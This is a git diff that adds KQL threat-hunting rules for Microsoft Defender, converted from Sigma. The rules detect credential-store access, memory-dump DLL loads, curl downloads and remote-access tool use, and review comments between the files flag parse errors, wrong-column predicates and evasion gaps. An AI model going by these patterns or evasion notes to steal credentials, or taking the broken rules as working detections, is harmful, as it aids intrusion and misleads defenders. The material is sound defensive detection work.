+// Description: Detects usage of 7zip utilities (7z.exe, 7za.exe and 7zr.exe) to extract password protected zip files.
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1560.001, detection.threat-hunting
+// False Positives:
+// - Legitimate activity is expected since extracting files with a password can be common in some environment.
+
+DeviceProcessEvents
+| where (ProcessVersionInfoFileDescription contains "7-Zip" or (FolderPath endswith "\\7z.exe" or FolderPath endswith "\\7zr.exe" or FolderPath endswith "\\7za.exe") or (ProcessVersionInfoOriginalFileName in~ ("7z.exe", "7za.exe"))) and (ProcessCommandLine contains " -p" and ProcessCommandLine contains " x " and ProcessCommandLine contains " -o")
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Collection/potentially_suspicious_compression_tool_parameters.kql b/KQL/rules-threat-hunting/Collection/potentially_suspicious_compression_tool_parameters.kql
new file mode 100644
index 00000000..c392e3c7
--- /dev/null
+++ b/KQL/rules-threat-hunting/Collection/potentially_suspicious_compression_tool_parameters.kql
@@ -0,0 +1,10 @@
+// Title: Potentially Suspicious Compression Tool Parameters
+// Author: Florian Roth (Nextron Systems), Samir Bousseaden
+// Date: 2019-10-15
+// Level: medium
+// Description: Detects potentially suspicious command line arguments of common data compression tools
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1560.001, detection.threat-hunting
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains " -p" or ProcessCommandLine contains " -ta" or ProcessCommandLine contains " -tb" or ProcessCommandLine contains " -sdel" or ProcessCommandLine contains " -dw" or ProcessCommandLine contains " -hp") and ((ProcessVersionInfoOriginalFileName contains "7z" and ProcessVersionInfoOriginalFileName contains ".exe") or ProcessVersionInfoOriginalFileName endswith "rar.exe" or (ProcessVersionInfoOriginalFileName contains "Command" and ProcessVersionInfoOriginalFileName contains "Line" and ProcessVersionInfoOriginalFileName contains "RAR"))) and (not((InitiatingProcessFolderPath contains ":\\Program Files\\" or InitiatingProcessFolderPath contains ":\\Program Files (x86)\\")))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Collection/system_drawing_dll_load.kql b/KQL/rules-threat-hunting/Collection/system_drawing_dll_load.kql
new file mode 100644
index 00000000..4c19b2cc
--- /dev/null
+++ b/KQL/rules-threat-hunting/Collection/system_drawing_dll_load.kql
@@ -0,0 +1,12 @@
+// Title: System Drawing DLL Load
+// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
+// Date: 2020-05-02
+// Level: low
+// Description: Detects processes loading "System.Drawing.ni.dll". This could be an indicator of potential Screen Capture.
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1113, detection.threat-hunting
+// False Positives:
+// - False positives are very common from system and third party applications, activity needs to be investigated. This rule is best correlated with other events to increase the level of suspiciousness
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\System.Drawing.ni.dll"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Command and Control/curl_exe_execution.kql b/KQL/rules-threat-hunting/Command and Control/curl_exe_execution.kql
new file mode 100644
index 00000000..6a609ab3
--- /dev/null
+++ b/KQL/rules-threat-hunting/Command and Control/curl_exe_execution.kql
@@ -0,0 +1,13 @@
+// Title: Curl.EXE Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-07-05
+// Level: low
+// Description: Detects a curl process start on Windows, which could indicates a file download from a remote location or a simple web request to a remote server
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105, detection.threat-hunting
+// False Positives:
+// - Scripts created by developers and admins
+// - Administrative activity
+
+DeviceProcessEvents
+| where FolderPath endswith "\\curl.exe" or ProcessVersionInfoProductName =~ "The curl executable"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Command and Control/curl_exe_execution_with_custom_useragent.kql b/KQL/rules-threat-hunting/Command and Control/curl_exe_execution_with_custom_useragent.kql
new file mode 100644
index 00000000..2f6a2f58
--- /dev/null
+++ b/KQL/rules-threat-hunting/Command and Control/curl_exe_execution_with_custom_useragent.kql
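Review bot: The match is on `\\System.Drawing.ni.dll` only, i.e. the NGEN native image; a process that loads the IL assembly `System.Drawing.dll` (or `System.Drawing.Common.dll` on newer .NET, if I recall correctly) is not caught, so either document that gap in the header or widen to `FolderPath endswith "\\System.Drawing.ni.dll" or FolderPath endswith "\\System.Drawing.dll"` after baselining. DeviceImageLoadEvents in MDE is, to my knowledge, not a complete image-load feed (only a subset of loads is reported), so the False Positives line should also warn that a miss here is not evidence of absence. A `summarize count() by InitiatingProcessFolderPath` at the end would make this usable as the frequency hunt the FP note describes.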
@@ -0,0 +1,13 @@
+// Title: Curl.EXE Execution With Custom UserAgent
+// Author: frack113
+// Date: 2022-01-23
+// Level: medium
+// Description: Detects execution of curl.exe with custom useragent options
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1071.001, detection.threat-hunting
+// False Positives:
+// - Scripts created by developers and admins
+// - Administrative activity
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\curl.exe" or ProcessVersionInfoProductName =~ "The curl executable") and (ProcessCommandLine contains " -A " or ProcessCommandLine contains " --user-agent ")
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Command and Control/file_download_via_curl_exe.kql b/KQL/rules-threat-hunting/Command and Control/file_download_via_curl_exe.kql
new file mode 100644
index 00000000..6ba7d784
--- /dev/null
+++ b/KQL/rules-threat-hunting/Command and Control/file_download_via_curl_exe.kql
@@ -0,0 +1,14 @@
+// Title: File Download Via Curl.EXE
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-07-05
+// Level: medium
+// Description: Detects file download using curl.exe
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105, detection.threat-hunting
+// False Positives:
+// - Scripts created by developers and admins
+// - Administrative activity
+// - The "\Git\usr\bin\sh.exe" process uses the "--output" flag to download a specific file in the temp directory with the pattern "gfw-httpget-xxxxxxxx.txt "
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\curl.exe" or ProcessVersionInfoProductName =~ "The curl executable") and (ProcessCommandLine contains " -O" or ProcessCommandLine contains "--remote-name" or ProcessCommandLine contains "--output")
\ No newline at end of file
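Review bot: The user-agent check requires a space after the switch (`" -A "`, `" --user-agent "`), but curl accepts the value attached to the short option (`-AMozilla/5.0`) and combined short flags (`-sA ...`), so a trivially reworded command line evades this rule. Dropping the trailing space, `ProcessCommandLine contains " -A" or ProcessCommandLine contains "--user-agent"`, closes that at the cost of a few more hits to baseline, which the "Administrative activity" FP line already anticipates. If the conversion is meant to stay 1:1 with the Sigma source, at least add a `// Note:` line in the header recording the gap.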
diff --git a/KQL/rules-threat-hunting/Command and Control/network_connection_initiated_from_users_public_folder.kql b/KQL/rules-threat-hunting/Command and Control/network_connection_initiated_from_users_public_folder.kql
new file mode 100644
index 00000000..9b144aaf
--- /dev/null
+++ b/KQL/rules-threat-hunting/Command and Control/network_connection_initiated_from_users_public_folder.kql
@@ -0,0 +1,15 @@
+// Title: Network Connection Initiated From Users\Public Folder
+// Author: Florian Roth (Nextron Systems)
+// Date: 2024-05-31
+// Level: medium
+// Description: Detects a network connection initiated from a process located in the "C:\Users\Public" folder.
+Attacker are known to drop their malicious payloads and malware in this directory as its writable by everyone.
+Use this rule to hunt for potential suspicious or uncommon activity in your environement.
+
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105, detection.threat-hunting
+// False Positives:
+// - Likely from legitimate third party application that execute from the "Public" directory.
+
+DeviceNetworkEvents
+| where InitiatingProcessFolderPath contains ":\\Users\\Public\\" and (not(InitiatingProcessFolderPath contains ":\\Users\\Public\\IBM\\ClientSolutions\\Start_Programs\\"))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Command and Control/potentially_suspicious_azure_front_door_connection.kql b/KQL/rules-threat-hunting/Command and Control/potentially_suspicious_azure_front_door_connection.kql
new file mode 100644
index 00000000..6c9bee4a
--- /dev/null
+++ b/KQL/rules-threat-hunting/Command and Control/potentially_suspicious_azure_front_door_connection.kql
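Review bot: Lines 6–7 of the new file (`Attacker are known to drop ...` and `Use this rule to hunt ...`) are description continuation lines emitted without the `//` prefix, so Advanced Hunting parses them as query text and the whole file fails to compile. Prefix every continuation line with `// ` (e.g. `// Attacker are known to drop their malicious payloads and malware in this directory ...`). This is a converter defect rather than a one-off — every rule in this patch whose Sigma description spans multiple lines shows the same unprefixed text — so it is better fixed in the generating script than by hand-editing each .kql. The IBM exclusion is an environment-specific tuning carried over from upstream and would benefit from a `// Tuning:` comment saying so.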
@@ -0,0 +1,15 @@
+// Title: Potentially Suspicious Azure Front Door Connection
+// Author: Isaac Dunham
+// Date: 2024-11-07
+// Level: medium
+// Description: Detects connections with Azure Front Door (known legitimate service that can be leveraged for C2)
+that fall outside of known benign behavioral baseline (not using common apps or common azurefd.net endpoints)
+
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1102.002, attack.t1090.004, detection.threat-hunting
+// False Positives:
+// - Results are not inherently suspicious, but should be investigated during threat hunting for potential cloud C2.
+// - Organization-specific Azure Front Door endpoints
+
+DeviceNetworkEvents
+| where RemoteUrl contains "azurefd.net" and (not((InitiatingProcessFolderPath endswith "searchapp.exe" or (RemoteUrl contains "afdxtest.z01.azurefd.net" or RemoteUrl contains "fp-afd.azurefd.net" or RemoteUrl contains "fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net" or RemoteUrl contains "roxy.azurefd.net" or RemoteUrl contains "powershellinfraartifacts-gkhedzdeaghdezhr.z01.azurefd.net" or RemoteUrl contains "storage-explorer-publishing-feapcgfgbzc2cjek.b01.azurefd.net" or RemoteUrl contains "graph.azurefd.net") or (InitiatingProcessFolderPath endswith "brave.exe" or InitiatingProcessFolderPath endswith "chrome.exe" or InitiatingProcessFolderPath endswith "chromium.exe" or InitiatingProcessFolderPath endswith "firefox.exe" or InitiatingProcessFolderPath endswith "msedge.exe" or InitiatingProcessFolderPath endswith "msedgewebview2.exe" or InitiatingProcessFolderPath endswith "opera.exe" or InitiatingProcessFolderPath endswith "vivaldi.exe"))))
\ No newline at end of file
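Review bot: The description continuation `that fall outside of known benign behavioral baseline ...` is emitted without `//`, so the file is not valid KQL until that line is commented. Separately, the benign-app exclusion keys only on the image name (`endswith "chrome.exe"`, `endswith "msedge.exe"`, ...), so a payload dropped under a user-writable path and named like a browser is excluded outright; for a hunt that is tolerable but should be written down, or anchor the exclusion to the browser install directories if the fleet allows it. The endpoint allow-list (`fp-afdx-bpdee4gtg6frejfd...`, `powershellinfraartifacts-...`) is a point-in-time snapshot and needs a `// Note:` that it must be re-baselined periodically.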
diff --git a/KQL/rules-threat-hunting/Command and Control/remote_access_tool_action1_arbitrary_code_execution_and_remote_sessions.kql b/KQL/rules-threat-hunting/Command and Control/remote_access_tool_action1_arbitrary_code_execution_and_remote_sessions.kql
new file mode 100644
index 00000000..a50c4793
--- /dev/null
+++ b/KQL/rules-threat-hunting/Command and Control/remote_access_tool_action1_arbitrary_code_execution_and_remote_sessions.kql
@@ -0,0 +1,28 @@
+// Title: Remote Access Tool - Action1 Arbitrary Code Execution and Remote Sessions
+// Author: @kostastsale
+// Date: 2023-04-13
+// Level: medium
+// Description: Detects the execution of Action1 in order to execute arbitrary code or establish a remote session.
+
+Action1 is a powerful Remote Monitoring and Management tool that enables users to execute commands, scripts, and binaries.
+Through the web interface of action1, the administrator must create a new policy or an app to establish remote execution and then points that the agent is installed.
+
+Hunting Opportunity 1- Weed Out The Noise
+
+When threat actors execute a script, a command, or a binary through these new policies and apps, the names of these become visible in the command line during the execution process. Below is an example of the command line that contains the deployment of a binary through a policy with name "test_app_1":
+
+ParentCommandLine: "C:\WINDOWS\Action1\action1_agent.exe schedule:Deploy_App__test_app_1_1681327673425 runaction:0"
+
+After establishing a baseline, we can split the command to extract the policy name and group all the policy names and inspect the results with a list of frequency occurrences.
+
+Hunting Opportunity 2 - Remote Sessions On Out Of Office Hours
+
+If you have admins within your environment using remote sessions to administer endpoints, you can create a threat-hunting query and modify the time of the initiated sessions looking for abnormal activity.
+
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1219.002, detection.threat-hunting
+// False Positives:
+// - If Action1 is among the approved software in your environment, you might find that this is a noisy query. See description for ideas on how to alter this query and start looking for suspicious activities.
+
+DeviceProcessEvents
+| where (FolderPath contains "\\Windows\\Action1\\package_downloads\\" and InitiatingProcessFolderPath endswith "\\action1_agent.exe") or ((InitiatingProcessCommandLine contains "\\Action1\\scripts\\Run_Command_" or InitiatingProcessCommandLine contains "\\Action1\\scripts\\Run_PowerShell_") and (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe")) or FolderPath endswith "\\agent1_remote.exe"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Command and Control/vscode_code_tunnel_execution_file_indicator.kql b/KQL/rules-threat-hunting/Command and Control/vscode_code_tunnel_execution_file_indicator.kql
new file mode 100644
index 00000000..68980619
--- /dev/null
+++ b/KQL/rules-threat-hunting/Command and Control/vscode_code_tunnel_execution_file_indicator.kql
@@ -0,0 +1,13 @@
+// Title: VsCode Code Tunnel Execution File Indicator
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-10-25
+// Level: medium
+// Description: Detects the creation of a file with the name "code_tunnel.json" which indicate execution and usage of VsCode tunneling utility. Attackers can abuse this functionality to establish a C2 channel
+
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, detection.threat-hunting
+// False Positives:
+// - Legitimate usage of VsCode tunneling functionality will also trigger this
+
+DeviceFileEvents
+| where FolderPath endswith "\\code_tunnel.json"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Credential Access/access_to_browser_credential_files_by_uncommon_applications.kql b/KQL/rules-threat-hunting/Credential Access/access_to_browser_credential_files_by_uncommon_applications.kql
new file mode 100644
index 00000000..34fbdd94
--- /dev/null
+++ b/KQL/rules-threat-hunting/Credential Access/access_to_browser_credential_files_by_uncommon_applications.kql
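Review bot: The multi-paragraph description of the Action1 rule (new-file lines 7–20, from `Action1 is a powerful ...` through `... looking for abnormal activity.`) is written without the `//` comment prefix, and line 14 is the bare literal `ParentCommandLine: "C:\WINDOWS\Action1\action1_agent.exe schedule:Deploy_App__test_app_1_1681327673425 runaction:0"`, so the file is a KQL syntax error and cannot be run in Advanced Hunting. Each non-blank continuation line needs `// ` in front of it; the blank separators can stay blank. Once commented, the two "Hunting Opportunity" paragraphs describe a `parse`/`summarize` workflow that the query itself does not implement — a `// Notes:` block stating that the query is only the seed for that workflow would keep the header honest.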
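Review bot: The VsCode tunnel rule's title and description speak of the *creation* of `code_tunnel.json`, but the query has no `ActionType` predicate, so every modification, rename and deletion of that file surfaces as well. Add `| where ActionType == "FileCreated"` (or `ActionType in ("FileCreated", "FileModified")` if you also want tunnel state refreshes) ahead of the path check. The same missing `ActionType` filter shows up in the other file-creation and file-deletion rules in this patch, which points at the converter rather than this rule.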
@@ -0,0 +1,18 @@
+// Title: Access To Browser Credential Files By Uncommon Applications
+// Author: frack113, X__Junior (Nextron Systems)
+// Date: 2022-04-09
+// Level: low
+// Description: Detects file access requests to browser credential stores by uncommon processes.
+Could indicate potential attempt of credential stealing.
+Requires heavy baselining before usage
+
+// MITRE Tactic: Credential Access
+// Tags: attack.t1003, attack.credential-access, detection.threat-hunting
+// False Positives:
+// - Antivirus, Anti-Spyware, Anti-Malware Software
+// - Backup software
+// - Legitimate software installed on partitions other than "C:\"
+// - Searching software such as "everything.exe"
+
+DeviceFileEvents
+| where ((FileName contains "\\User Data\\Default\\Login Data" or FileName contains "\\User Data\\Local State") or (FileName endswith "\\cookies.sqlite" or FileName endswith "\\places.sqlite" or FileName endswith "release\\key3.db" or FileName endswith "release\\key4.db" or FileName endswith "release\\logins.json") or FileName endswith "\\Appdata\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat") and (not(((InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\system32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\") or InitiatingProcessFolderPath =~ "System"))) and (not((((InitiatingProcessFolderPath endswith "\\MpCopyAccelerator.exe" or InitiatingProcessFolderPath endswith "\\MsMpEng.exe") and InitiatingProcessFolderPath startswith "C:\\ProgramData\\Microsoft\\Windows Defender\\") or (InitiatingProcessFolderPath endswith "\\thor.exe" or InitiatingProcessFolderPath endswith "\\thor64.exe"))))
\ No newline at end of file
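Review bot: The path patterns are applied to `FileName` (`FileName contains "\\User Data\\Default\\Login Data"`, `FileName endswith "\\cookies.sqlite"`, ...), but in DeviceFileEvents `FileName` holds only the leaf name, so a predicate containing a backslash can never match and this rule returns nothing. The path predicates belong on `FolderPath`, which is what the other file rules in this patch already use (`FolderPath endswith ".pfx"`, `FolderPath endswith "\\code_tunnel.json"`); change every `FileName` in the first group to `FolderPath` and re-test against live data. The continuation lines `Could indicate potential attempt of credential stealing.` and `Requires heavy baselining before usage` also lack the `//` prefix and break the query on their own. Finally, MDE's DeviceFileEvents does not record plain read access as far as I know, so a rule derived from a Sigma file_access source will only see copies/renames/deletes of these stores here — that limitation should be stated in the header.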
diff --git a/KQL/rules-threat-hunting/Credential Access/access_to_chromium_browsers_sensitive_files_by_uncommon_applications.kql b/KQL/rules-threat-hunting/Credential Access/access_to_chromium_browsers_sensitive_files_by_uncommon_applications.kql
new file mode 100644
index 00000000..e84184c5
--- /dev/null
+++ b/KQL/rules-threat-hunting/Credential Access/access_to_chromium_browsers_sensitive_files_by_uncommon_applications.kql
@@ -0,0 +1,17 @@
+// Title: Access To Chromium Browsers Sensitive Files By Uncommon Applications
+// Author: X__Junior (Nextron Systems)
+// Date: 2024-07-29
+// Level: low
+// Description: Detects file access requests to chromium based browser sensitive files by uncommon processes.
+Could indicate potential attempt of stealing sensitive information.
+
+// MITRE Tactic: Credential Access
+// Tags: attack.t1003, attack.credential-access, detection.threat-hunting
+// False Positives:
+// - Antivirus, Anti-Spyware, Anti-Malware Software
+// - Backup software
+// - Legitimate software installed on partitions other than "C:\"
+// - Searching software such as "everything.exe"
+
+DeviceFileEvents
+| where (FileName contains "\\User Data\\Default\\Cookies" or FileName contains "\\User Data\\Default\\History" or FileName contains "\\User Data\\Default\\Network\\Cookies" or FileName contains "\\User Data\\Default\\Web Data") and (not(((InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\system32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\") or InitiatingProcessFolderPath =~ "System"))) and (not(((InitiatingProcessFolderPath endswith "\\MpCopyAccelerator.exe" or InitiatingProcessFolderPath endswith "\\MsMpEng.exe") and InitiatingProcessFolderPath startswith "C:\\ProgramData\\Microsoft\\Windows Defender\\")))
\ No newline at end of file
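Review bot: Same column mix-up as the sibling browser-credential rule: `FileName contains "\\User Data\\Default\\Cookies"` and the three other predicates test the leaf file name for a backslash-separated path, which cannot match in DeviceFileEvents, so the rule is dead as written; move those four predicates to `FolderPath`. The description continuation `Could indicate potential attempt of stealing sensitive information.` is missing its `//` and makes the file fail to parse regardless. With the column fixed, `contains "\\User Data\\Default\\Cookies"` will also match `...\Default\Cookies-journal`, which is probably intended but deserves a one-line comment.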
diff --git a/KQL/rules-threat-hunting/Credential Access/access_to_sysvol_policies_share_by_uncommon_process.kql b/KQL/rules-threat-hunting/Credential Access/access_to_sysvol_policies_share_by_uncommon_process.kql
new file mode 100644
index 00000000..8ee6547c
--- /dev/null
+++ b/KQL/rules-threat-hunting/Credential Access/access_to_sysvol_policies_share_by_uncommon_process.kql
@@ -0,0 +1,10 @@
+// Title: Access To Sysvol Policies Share By Uncommon Process
+// Author: frack113
+// Date: 2023-12-21
+// Level: medium
+// Description: Detects file access requests to the Windows Sysvol Policies Share by uncommon processes
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1552.006, detection.threat-hunting
+
+DeviceFileEvents
+| where ((FileName contains "\\sysvol\\" and FileName contains "\\Policies\\") and FileName startswith "\\") and (not((InitiatingProcessFolderPath contains ":\\Program Files (x86)\\" or InitiatingProcessFolderPath contains ":\\Program Files\\" or InitiatingProcessFolderPath contains ":\\Windows\\explorer.exe" or InitiatingProcessFolderPath contains ":\\Windows\\system32\\" or InitiatingProcessFolderPath contains ":\\Windows\\SysWOW64\\")))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Credential Access/dbghelp_dbgcore_dll_loaded_by_uncommon_suspicious_process.kql b/KQL/rules-threat-hunting/Credential Access/dbghelp_dbgcore_dll_loaded_by_uncommon_suspicious_process.kql
new file mode 100644
index 00000000..c1c3f7b3
--- /dev/null
+++ b/KQL/rules-threat-hunting/Credential Access/dbghelp_dbgcore_dll_loaded_by_uncommon_suspicious_process.kql
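Review bot: `FileName contains "\\sysvol\\"`, `FileName contains "\\Policies\\"` and `FileName startswith "\\"` are all path tests on a column that carries only the leaf name in DeviceFileEvents, so `startswith "\\"` is never true and the rule returns no rows; rewrite them against `FolderPath` (e.g. `FolderPath startswith "\\\\" and FolderPath contains "\\sysvol\\" and FolderPath contains "\\Policies\\"` if the intent is UNC access to the share — confirm against the Sigma source, which I cannot see here). There is no False Positives block in this file; Group Policy client processing, GPO backup tooling and DFS-R/SYSVOL replication all touch these paths and should be listed so the hunt is not discarded as noise.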
@@ -0,0 +1,16 @@
+// Title: Dbghelp/Dbgcore DLL Loaded By Uncommon/Suspicious Process
+// Author: Perez Diego (@darkquassar), oscd.community, Ecco
+// Date: 2019-10-27
+// Level: medium
+// Description: Detects the load of dbghelp/dbgcore DLL by a potentially uncommon or potentially suspicious process.
+The Dbghelp and Dbgcore DLLs export functions that allow for the dump of process memory. Tools like ProcessHacker, Task Manager and some attacker tradecraft use the MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll.
+As an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine.
+Keep in mind that many legitimate Windows processes and services might load the aforementioned DLLs for debugging or other related purposes. Investigate the CommandLine and the Image location of the process loading the DLL.
+
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.001, detection.threat-hunting
+// False Positives:
+// - Debugging scripts might leverage this DLL in order to dump process memory for further analysis.
+
+DeviceImageLoadEvents
+| where ((FolderPath endswith "\\dbghelp.dll" or FolderPath endswith "\\dbgcore.dll") and (InitiatingProcessFolderPath endswith "\\bash.exe" or InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\dnx.exe" or InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\monitoringhost.exe" or InitiatingProcessFolderPath endswith "\\msbuild.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\regsvcs.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\sc.exe" or InitiatingProcessFolderPath endswith "\\scriptrunner.exe" or InitiatingProcessFolderPath endswith "\\winword.exe" or InitiatingProcessFolderPath endswith "\\wmic.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe")) and (not((((InitiatingProcessCommandLine endswith "-k LocalServiceNetworkRestricted" or InitiatingProcessCommandLine endswith "-k WerSvcGroup") and InitiatingProcessFolderPath endswith "\\svchost.exe") or ((InitiatingProcessCommandLine contains "/d srrstr.dll,ExecuteScheduledSPPCreation" or InitiatingProcessCommandLine contains "aepdu.dll,AePduRunUpdate" or InitiatingProcessCommandLine contains "shell32.dll,OpenAs_RunDL" or InitiatingProcessCommandLine contains "Windows.Storage.ApplicationData.dll,CleanupTemporaryState") and InitiatingProcessFolderPath endswith "\\rundll32.exe") or (InitiatingProcessCommandLine endswith "\\TiWorker.exe -Embedding" and InitiatingProcessCommandLine startswith "C:\\WINDOWS\\WinSxS\\"))))
\ No newline at end of file
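Review bot: New-file lines 6–8 (`The Dbghelp and Dbgcore DLLs export ...`, `As an example, SilentTrynity ...`, `Keep in mind that ...`) are emitted without the `//` prefix and turn the file into a KQL syntax error; prefix each with `// `. In the query, the `svchost.exe` and `TiWorker.exe` exclusions are dead code, because neither image appears in the positive `InitiatingProcessFolderPath endswith` list — only the `rundll32.exe` branch of the exclusion can ever fire — so either drop them or add `// carried over from the Sigma source; inert with the current selection` above the `not(...)`. `InitiatingProcessCommandLine startswith "C:\\WINDOWS\\WinSxS\\"` will also not match if the TiWorker path is quoted in the recorded command line, which is worth verifying before relying on that exclusion.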
diff --git a/KQL/rules-threat-hunting/Credential Access/eventlog_query_requests_by_builtin_utilities.kql b/KQL/rules-threat-hunting/Credential Access/eventlog_query_requests_by_builtin_utilities.kql
new file mode 100644
index 00000000..f3c4df7a
--- /dev/null
+++ b/KQL/rules-threat-hunting/Credential Access/eventlog_query_requests_by_builtin_utilities.kql
@@ -0,0 +1,13 @@
+// Title: EventLog Query Requests By Builtin Utilities
+// Author: Ali Alwashali, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-11-20
+// Level: medium
+// Description: Detect attempts to query the contents of the event log using command line utilities. Attackers use this technique in order to look for sensitive information in the logs such as passwords, usernames, IPs, etc.
+
+// MITRE Tactic: Credential Access
+// Tags: attack.t1552, attack.credential-access, detection.threat-hunting
+// False Positives:
+// - Legitimate log access by administrators or troubleshooting tools
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "Select" and ProcessCommandLine contains "Win32_NTLogEvent") or ((ProcessCommandLine contains " qe " or ProcessCommandLine contains " query-events ") and (FolderPath endswith "\\wevtutil.exe" or ProcessVersionInfoOriginalFileName =~ "wevtutil.exe")) or (ProcessCommandLine contains " ntevent" and (FolderPath endswith "\\wmic.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")) or (ProcessCommandLine contains "Get-WinEvent " or ProcessCommandLine contains "get-eventlog ")
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Credential Access/pfx_file_creation.kql b/KQL/rules-threat-hunting/Credential Access/pfx_file_creation.kql
new file mode 100644
index 00000000..a108ce05
--- /dev/null
+++ b/KQL/rules-threat-hunting/Credential Access/pfx_file_creation.kql
@@ -0,0 +1,26 @@
+// Title: PFX File Creation
+// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
+// Date: 2020-05-02
+// Level: low
+// Description: Detects the creation of PFX files (Personal Information Exchange format).
+PFX files contain private keys and certificates bundled together, making them valuable targets for attackers seeking to:
+
+ - Exfiltrate digital certificates for impersonation or signing malicious code
+ - Establish persistent access through certificate-based authentication
+ - Bypass security controls that rely on certificate validation
+
+Analysts should investigate PFX file creation events by examining which process created the PFX file and its parent process chain, as well as unusual locations outside standard certificate stores or development environments.
+
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1552.004, detection.threat-hunting
+// False Positives:
+// - System administrators legitimately managing certificates and PKI infrastructure
+// - Development environments where developers create test certificates for application signing
+// - Automated certificate deployment tools and scripts used in enterprise environments
+// - Software installation processes that include certificate provisioning (e.g., web servers, VPN clients)
+// - Certificate backup and recovery operations performed by IT staff
+// - Build systems and CI/CD pipelines that generate code signing certificates
+// - Third-party applications that create temporary certificates for secure communications
+
+DeviceFileEvents
+| where FolderPath endswith ".pfx" and (not((FolderPath startswith "C:\\Program Files\\CMake\\" or ((InitiatingProcessFolderPath in~ ("C:\\Program Files\\Microsoft OneDrive\\OneDrive.exe", "C:\\Program Files (x86)\\Microsoft OneDrive\\OneDrive.exe")) and FolderPath endswith "\\OneDrive\\CodeSigning.pfx") or (FolderPath startswith "C:\\Program Files (x86)\\Microsoft Visual Studio\\" or FolderPath
startswith "C:\\Program Files\\Microsoft Visual Studio\\"))))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Credential Access/potential_password_reconnaissance_via_findstr_exe.kql b/KQL/rules-threat-hunting/Credential Access/potential_password_reconnaissance_via_findstr_exe.kql
new file mode 100644
index 00000000..bcae8b3a
--- /dev/null
+++ b/KQL/rules-threat-hunting/Credential Access/potential_password_reconnaissance_via_findstr_exe.kql
@@ -0,0 +1,10 @@
+// Title: Potential Password Reconnaissance Via Findstr.EXE
+// Author: Josh Nickels
+// Date: 2023-05-18
+// Level: medium
+// Description: Detects command line usage of "findstr" to search for the "passwords" keyword in a variety of different languages
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1552.001, detection.threat-hunting
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "contraseña" or ProcessCommandLine contains "hasło" or ProcessCommandLine contains "heslo" or ProcessCommandLine contains "parola" or ProcessCommandLine contains "passe" or ProcessCommandLine contains "passw" or ProcessCommandLine contains "senha" or ProcessCommandLine contains "senord" or ProcessCommandLine contains "密碼") and (FolderPath endswith "\\findstr.exe" or ProcessVersionInfoOriginalFileName =~ "FINDSTR.EXE")
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Credential Access/unattend_xml_file_access_attempt.kql b/KQL/rules-threat-hunting/Credential Access/unattend_xml_file_access_attempt.kql
new file mode 100644
index 00000000..01401fe1
--- /dev/null
+++ b/KQL/rules-threat-hunting/Credential Access/unattend_xml_file_access_attempt.kql
